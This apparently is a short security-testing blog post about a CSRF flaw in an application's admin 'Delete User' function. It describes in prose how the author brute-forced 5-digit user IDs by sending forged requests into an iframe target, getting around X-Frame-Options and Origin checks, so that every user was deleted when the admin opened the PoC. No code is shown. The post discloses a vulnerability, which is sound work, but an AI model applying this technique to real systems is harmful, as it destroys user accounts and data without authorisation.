Brute Forcing User IDS via CSRF To Delete all Users with CSRF attack.

While testing an application, there was a module “Delete User” in which an admin can delete any user.

If you notice in the request, there is no CSRF Token/Protection implemented into delete user request.

This was very easy CSRF that an attacker can send form to admin and can delete the user from an application.

Simple CSRF PoC to Delete User

But again if you notice that request contains the user id. My challenge was to figure out that if an application user ids at any end points but i found that there was no user ID leakage.

As it was 5 digit numeric ID, It was easy to brute force,

From a research i got the blog post in which an attacker has brute forced the IDs with the help of click jacking.

  • Now Challenge is that an application was using X-Frame Options Header so I was not able to load an application into frame to brute force the IDS .
  • I tried with XmlHTTPRequest, But again an application was validating the ORIGIN so in this case XHR dint work for me.

Then I tried by throwing request into iframe target.

In this case I was not able to view the response as response had X-Frame-Option Header which application was validating.But i was able to send the request

So I made a CSRF Script which brute forces the USER IDS and deletes all the existing Users with CSRF from an application

And When I sent this PoC to victim (admin) , I was able to delete all Existing users from an application.

Thanks guys for reading. 
Have a great day ahead.